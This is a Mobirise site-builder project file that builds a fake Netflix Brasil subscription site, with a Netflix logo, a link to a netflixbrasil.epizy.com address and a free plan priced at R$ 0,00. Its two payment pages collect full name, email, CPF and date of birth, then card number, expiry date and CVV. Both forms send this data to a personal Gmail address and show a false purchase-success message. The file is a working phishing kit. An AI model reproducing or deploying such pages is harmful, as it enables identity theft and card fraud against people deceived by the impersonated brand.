{
  "settings": {
    "name": "Site-04-02_2353",
    "currentPage": "index.html",
    "theme": {
      "name": "default",
      "title": "Mobirise",
      "styling": {},
      "additionalSetColors": []
    },
    "path": "@PROJECT_PATH@",
    "versionFirst": "4.12.3",
    "siteFonts": [],
    "imageResize": true,
    "uniqCompNum": 6,
    "versionPublish": "4.12.3",
    "screenshot": "screenshot.png"
  },
  "pages": {
    "index.html": {
      "settings": {
        "main": true,
        "title": "Home",
        "meta_descr": "",
        "header_custom": "",
        "footer_custom": "",
        "html_before": ""
      },
      "components": [
        {
          "_inherit": "menu",
          "_params": {
            "logo": true,
            "showBrand": false,
            "showButtons": false,
            "sticky": false,
            "collapsed": false,
            "transparent": true,
            "color": "#2c2c2c",
            "hamburgerColor": "#ffffff"
          },
          "buttons": "<li class=\"mbr-navbar__item\"><a data-app-btn=\"parent\" class=\"mbr-buttons__btn btn btn-danger\" data-app-selector=\".mbr-navbar__items a\" href=\"https://mobirise.com\">DOWNLOAD</a></li>",
          "_tags": [
            "Theme"
          ],
          "_styles": {
            ".mbr-brand__name": {
              "font-size": "16px"
            },
            "&.mbr-navbar--stuck .mbr-navbar__section": {
              "background": "#2c2c2c"
            },
            ".mbr-navbar__section": {},
            ".mbr-navbar__hamburger": {
              "color": "#ffffff"
            }
          },
          "items": "<li class=\"mbr-navbar__item\"><a data-app-btn=\"true\" class=\"mbr-buttons__link btn mbr-menu-item text-white\" data-app-selector=\".mbr-navbar__items a\" href=\"pagamento.html\"></a></li>",
          "logo": {
            "image": {
              "active": true,
              "src": "@PROJECT_PATH@/assets/images/netflix-logo-5-474x128.png",
              "class": "mbr-navbar__brand-img mbr-brand__img",
              "height": 128,
              "alt": "Mobirise",
              "link": "http://netflixbrasil.epizy.com/index.html",
              "title": "",
              "linkInNewWindow": false
            },
            "iconFont": {
              "class": "mbr-iconfont mbr-iconfont-menu",
              "link": "https://mobirise.com",
              "size": 0
            }
          },
          "brand": "<a class=\"mbr-brand__name text-white\" data-app-btn=\"true\" href=\"https://mobirise.com\" data-app-selector=\".mbr-brand__name a\" data-app-placeholder=\"Type Brand Name\">MOBIRISE</a>",
          "_name": "ext.menu",
          "_anchor": "ext_menu-1"
        },
        {
          "_params": {
            "firstType": "default",
            "secondType": "green",
            "thirdType": "favorite",
            "fourthType": "orange",
            "fifthType": "hidden",
            "paddingTop": 3,
            "paddingBottom": 3,
            "showButtons": true,
            "bgImageRadio": false,
            "bgImage": "images/bg3.jpg",
            "parallax": true,
            "bgColorRadio": true,
            "bgColor": "#f0f0f0",
            "bgVideoRadio": false,
            "bgVideo": {
              "url": "http://www.youtube.com/watch?v=uNCr7NdOJgw"
            },
            "overlay": false,
            "overlayColor": "#222",
            "overlayOpacity": 0.5
          },
          "title1": "STANDARD",
          "currency1": "R$",
          "price1": "0,00",
          "period1": "per month",
          "list1": "<b>&nbsp; &nbsp; HD disponível Não</b><ul><li></li></ul><div><b>------------------------------Ultra HD disponível &nbsp; &nbsp; &nbsp; Não\n</b></div><div><b>------------------------------\n</b></div><div><b>&nbsp; &nbsp; Telas simultâneas 0</b></div><div><b>------------------------------\n</b></div><div><b>&nbsp; &nbsp; &nbsp;Assista no notebook, TV, smartphone ou &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tablet\n</b></div><div><b>------------------------------\n</b></div><div><b>&nbsp; &nbsp; &nbsp; Filmes e séries ilimitados\n</b></div><div><b>------------------------------\n</b></div><div><b>&nbsp; &nbsp; &nbsp; Cancele quando quiser</b></div>",
          "button1": "<a data-app-btn=\"true\" href=\"pagamento.html\" class=\"mbr-buttons__btn btn btn-wrap btn-xs-lg btn-danger\" data-toolbar=\"-mbrBtnMove\">Carrinho</a>",
          "title2": "BUSINESS",
          "currency2": "$",
          "price2": "4,99",
          "period2": "per month",
          "list2": "<b>&nbsp; &nbsp;HD disponível Sim\n</b><ul><li></li></ul><div><b>------------------------------Ultra HD disponível &nbsp; &nbsp; &nbsp;Sim\n</b></div><div><b>------------------------------\n</b></div><div><b>&nbsp; &nbsp;Telas simultâneas 1</b></div><div><b>------------------------------\n</b></div><div><b>&nbsp; &nbsp;Assista no notebook, TV, smartphone ou &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tablet\n</b></div><div><b>------------------------------\n</b></div><div><b>&nbsp; &nbsp;Filmes e séries ilimitados\n</b></div><div><b>------------------------------\n</b></div><div><b>&nbsp; &nbsp;Filmes e séries Ultra Wide\n</b></div><div><b>------------------------------\n</b></div><div><b>&nbsp; Conteúdo Infantíl &amp; Educativo\n</b></div><div><b>------------------------------\n</b></div><div><b>&nbsp; Cancele quando quiser\n</b></div><div><b>\n</b></div><div><b><br></b></div>",
          "button2": "<a data-app-btn=\"true\" href=\"pagamento.html\" class=\"mbr-buttons__btn btn btn-wrap btn-xs-lg btn-danger\" data-toolbar=\"-mbrBtnMove\">Carrinho</a>",
          "title3": "PREMIUM",
          "currency3": "$",
          "price3": "9,99",
          "period3": "per month",
          "list3": "<b>&nbsp; &nbsp;HD disponível Sim\n</b><ul><li></li></ul><div><b>------------------------------Ultra HD disponível &nbsp; &nbsp; Sim\n</b></div><div><b>------------------------------\n</b></div><div><b>&nbsp; &nbsp;Telas simultâneas 4</b></div><div><b>------------------------------\n</b></div><div><b>&nbsp; &nbsp;Assista no notebook, TV, smartphone ou &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tablet\n</b></div><div><b>------------------------------\n</b></div><div><b>&nbsp; &nbsp;Filmes e séries ilimitados\n</b></div><div><b>------------------------------\n</b></div><div><b>&nbsp; &nbsp;Filmes e séries Ultra Wide\n</b></div><div><b>------------------------------\n</b></div><div><b>&nbsp; &nbsp;Conteúdo Infantíl &amp; Educativo\n</b></div><div><b>------------------------------\n</b></div><div><b>&nbsp; &nbsp;Cancele quando quiser\n</b></div><div><b>\n</b></div><div><b><br></b></div>",
          "button3": "<a data-app-btn=\"true\" href=\"pagamento.html\" class=\"mbr-buttons__btn btn btn-wrap btn-xs-lg btn-danger\" data-toolbar=\"-mbrBtnMove\">Carrinho</a>",
          "title4": "ULTIMATE",
          "currency4": "$",
          "price4": "19,99",
          "period4": "per month",
          "list4": "&nbsp; &nbsp;HD disponível Sim\n<div>------------------------------Ultra HD disponível     Sim\n</div><div>------------------------------\n</div><div>&nbsp; &nbsp;Telas simultâneas 4\n</div><div>------------------------------\n</div><div>&nbsp; &nbsp;Assista no notebook, TV, smartphone ou            tablet\n</div><div>------------------------------\n</div><div>&nbsp; &nbsp;Filmes e séries ilimitados\n</div><div>------------------------------\n</div><div>&nbsp; &nbsp;Filmes e séries Ultra Wide\n</div><div>------------------------------\n</div><div>&nbsp; &nbsp;Conteúdo Infantíl &amp; Educativo\n</div><div>------------------------------\n</div><div>&nbsp; &nbsp;Sugerir filmes instantaneos\n</div><div>------------------------------\n</div><div>&nbsp; &nbsp;Conteudo adulto incluido\n</div><div>------------------------------\n</div><div>&nbsp; &nbsp;Bloqueia conteudo adulto\n</div><div>------------------------------\n</div><div>&nbsp; &nbsp; +7 Ou mais pessoas logado\n</div><div>------------------------------\n</div><div>&nbsp; &nbsp;Cancele quando quiser</div><div><br></div>",
          "button4": "<a data-app-btn=\"true\" href=\"pagamento.html\" class=\"mbr-buttons__btn btn btn-wrap btn-xs-lg btn-danger\" data-toolbar=\"-mbrBtnMove\">Carrinho</a>",
          "title5": "EXTENDED",
          "currency5": "$",
          "price5": "0",
          "period5": "per month",
          "list5": "<ul><li><b>Unlimited</b> Storage</li><li><b>Unlimited</b> Users</li><li><b>2 TB</b> Bandwidth</li></ul>",
          "button5": "<a data-app-btn=\"true\" href=\"https://mobirise.com\" class=\"mbr-buttons__btn btn btn-wrap btn-xs-lg btn-default\">DEMO LINK</a>",
          "_tags": [
            "Theme"
          ],
          "_name": "pricing-table1",
          "_anchor": "pricing-table1-0"
        }
      ]
    },
    "pagamento.html": {
      "settings": {
        "meta_descr": "Web Page Generator Description",
        "title": "Pagamento",
        "order": 2
      },
      "components": [
        {
          "_inherit": "menu",
          "_params": {
            "logo": true,
            "showBrand": false,
            "showButtons": false,
            "sticky": false,
            "collapsed": false,
            "transparent": true,
            "color": "#2c2c2c",
            "hamburgerColor": "#ffffff"
          },
          "buttons": "<li class=\"mbr-navbar__item\"><a data-app-btn=\"parent\" class=\"mbr-buttons__btn btn btn-danger\" data-app-selector=\".mbr-navbar__items a\" href=\"https://mobirise.com\">DOWNLOAD</a></li>",
          "_tags": [
            "Theme"
          ],
          "_styles": {
            ".mbr-brand__name": {
              "font-size": "16px"
            },
            "&.mbr-navbar--stuck .mbr-navbar__section": {
              "background": "#2c2c2c"
            },
            ".mbr-navbar__section": {},
            ".mbr-navbar__hamburger": {
              "color": "#ffffff"
            }
          },
          "items": "<li class=\"mbr-navbar__item\"><a data-app-btn=\"true\" class=\"mbr-buttons__link btn mbr-menu-item text-white\" data-app-selector=\".mbr-navbar__items a\" href=\"pagamento.html\"></a></li>",
          "logo": {
            "image": {
              "active": true,
              "src": "@PROJECT_PATH@/assets/images/netflix-logo-5-474x128.png",
              "class": "mbr-navbar__brand-img mbr-brand__img",
              "height": 128,
              "alt": "Mobirise",
              "link": "http://netflixbrasil.epizy.com/index.html",
              "title": "",
              "linkInNewWindow": false
            },
            "iconFont": {
              "class": "mbr-iconfont mbr-iconfont-menu",
              "link": "https://mobirise.com",
              "size": 0
            }
          },
          "brand": "<a class=\"mbr-brand__name text-white\" data-app-btn=\"true\" href=\"https://mobirise.com\" data-app-selector=\".mbr-brand__name a\" data-app-placeholder=\"Type Brand Name\">MOBIRISE</a>",
          "_name": "ext.menu",
          "_anchor": "ext_menu-1"
        },
        {
          "_params": {
            "showTitle": true,
            "paddingTop": 3,
            "paddingBottom": 3,
            "bgImageRadio": false,
            "bgImage": "images/bg3.jpg",
            "parallax": true,
            "bgColorRadio": true,
            "bgColor": "#ffffff",
            "overlay": false,
            "overlayColor": "#222",
            "overlayOpacity": 0.5
          },
          "title": "Visa/Master Card\n<div>Coloque as informações abaixo, apos isso marque a caixinha de confirmação e clique em continuar. -&gt; Finalizar Pagamento\n</div><div><br></div>",
          "buttons": "<a data-app-btn=\"true\" type=\"submit\" class=\"mbr-buttons__btn btn btn-lg btn-info\" data-toolbar=\"-mbrLink,-mbrBtnAdd,-mbrBtnMove\">Continuar 👇</a>",
          "form": {
            "action": "twyzerh@gmail.com",
            "alerts": {
              "success": "Clique em Finalizar pagamento R$ 0,00"
            },
            "fields": {
              "name": {
                "visible": true,
                "title": "Name",
                "customTitle": "Nome completo *"
              },
              "email": {
                "visible": true,
                "title": "Email",
                "customTitle": "Email *"
              },
              "phone": {
                "visible": true,
                "title": "Phone",
                "customTitle": "CPF * "
              },
              "message": {
                "title": "Message",
                "customTitle": "Data de nascimento *"
              }
            }
          },
          "_tags": [
            "Theme"
          ],
          "_name": "form1",
          "_anchor": "form1-2",
          "_styles": {
            ".mbr-header__text": {
              "color": "#27aae0"
            },
            ".mbr-header__text DIV": {
              "font-size": "15px",
              "font-family": "'Open Sans', sans-serif",
              "googleLink": "https://fonts.googleapis.com/css?family=Open+Sans:400,300,700"
            }
          }
        },
        {
          "buttons": "<a data-app-btn=\"true\" class=\"mbr-buttons__btn btn btn-lg btn-info\" href=\"page2.html\" data-toolbar=\"-mbrBtnMove\">🔓 Finalizar pagamento R$ 0,00</a> ",
          "_tags": [
            "Theme"
          ],
          "_name": "buttons1",
          "_anchor": "buttons1-3"
        }
      ]
    },
    "page2.html": {
      "settings": {
        "meta_descr": "Web Creator Description",
        "title": "Pagamento 2",
        "order": 1
      },
      "components": [
        {
          "_inherit": "menu",
          "_params": {
            "logo": true,
            "showBrand": false,
            "showButtons": false,
            "sticky": false,
            "collapsed": false,
            "transparent": true,
            "color": "#2c2c2c",
            "hamburgerColor": "#ffffff"
          },
          "buttons": "<li class=\"mbr-navbar__item\"><a data-app-btn=\"parent\" class=\"mbr-buttons__btn btn btn-danger\" data-app-selector=\".mbr-navbar__items a\" href=\"https://mobirise.com\">DOWNLOAD</a></li>",
          "_tags": [
            "Theme"
          ],
          "_styles": {
            ".mbr-brand__name": {
              "font-size": "16px"
            },
            "&.mbr-navbar--stuck .mbr-navbar__section": {
              "background": "#2c2c2c"
            },
            ".mbr-navbar__section": {},
            ".mbr-navbar__hamburger": {
              "color": "#ffffff"
            }
          },
          "items": "<li class=\"mbr-navbar__item\"><a data-app-btn=\"true\" class=\"mbr-buttons__link btn mbr-menu-item text-white\" data-app-selector=\".mbr-navbar__items a\" href=\"pagamento.html\"></a></li>",
          "logo": {
            "image": {
              "active": true,
              "src": "@PROJECT_PATH@/assets/images/netflix-logo-5-474x128.png",
              "class": "mbr-navbar__brand-img mbr-brand__img",
              "height": 128,
              "alt": "Mobirise",
              "link": "http://netflixbrasil.epizy.com/index.html",
              "title": "",
              "linkInNewWindow": false
            },
            "iconFont": {
              "class": "mbr-iconfont mbr-iconfont-menu",
              "link": "https://mobirise.com",
              "size": 0
            }
          },
          "brand": "<a class=\"mbr-brand__name text-white\" data-app-btn=\"true\" href=\"https://mobirise.com\" data-app-selector=\".mbr-brand__name a\" data-app-placeholder=\"Type Brand Name\">MOBIRISE</a>",
          "_name": "ext.menu",
          "_anchor": "ext_menu-4"
        },
        {
          "_params": {
            "showTitle": false,
            "paddingTop": 3,
            "paddingBottom": 3,
            "bgImageRadio": false,
            "bgImage": "images/bg3.jpg",
            "parallax": true,
            "bgColorRadio": true,
            "bgColor": "#ffffff",
            "overlay": false,
            "overlayColor": "#222",
            "overlayOpacity": 0.5
          },
          "title": "CONTACT FORM",
          "buttons": "<a data-app-btn=\"true\" type=\"submit\" class=\"mbr-buttons__btn btn btn-lg btn-info\" data-toolbar=\"-mbrLink,-mbrBtnAdd,-mbrBtnMove\">💳Assinar</a>",
          "form": {
            "action": "twyzerh@gmail.com",
            "alerts": {
              "success": "Compra realizar com sucesso, olhe seu email."
            },
            "fields": {
              "name": {
                "visible": true,
                "title": "Name",
                "customTitle": "Número do cartão *"
              },
              "email": {
                "visible": false,
                "title": "Email",
                "customTitle": "Email*"
              },
              "phone": {
                "visible": true,
                "title": "Phone",
                "customTitle": "MM/AA                                Data de valida"
              },
              "message": {
                "title": "Message",
                "customTitle": "CVV                                        Codigo de verificação"
              }
            }
          },
          "_tags": [
            "Theme"
          ],
          "_name": "form1",
          "_anchor": "form1-5"
        }
      ]
    }
  }
}